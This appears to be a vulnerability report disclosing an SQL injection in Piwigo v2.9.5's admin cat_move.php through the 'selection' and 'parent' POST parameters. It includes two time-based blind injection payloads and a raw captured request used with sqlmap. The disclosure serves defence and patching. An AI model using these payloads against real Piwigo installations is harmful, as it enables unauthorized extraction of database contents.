SQL injection in cat_move.php

[zongdeiqianxing]

Hi, I found a sql injection vulnerability in cat_move.php:
The 'move_categories' method is called when moving the album in '/admin.php?page=cat_move', but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability.

replace any of the following parameter in POST requests to reappear the vulnerability：
selection%5B%5D=1)` and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23
or
parent=1 and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23

I use 'sqlmap' to reappear the vulnerability:

[zongdeiqianxing]

POST /admin.php?page=cat_move HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=cat_move
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
Connection: close
Upgrade-Insecure-Requests: 1

selection%5B%5D=4&parent=7&submit=%E6%8F%90%E4%BA%A4

[plegall]

vulnerability found in Piwigo v2.9.5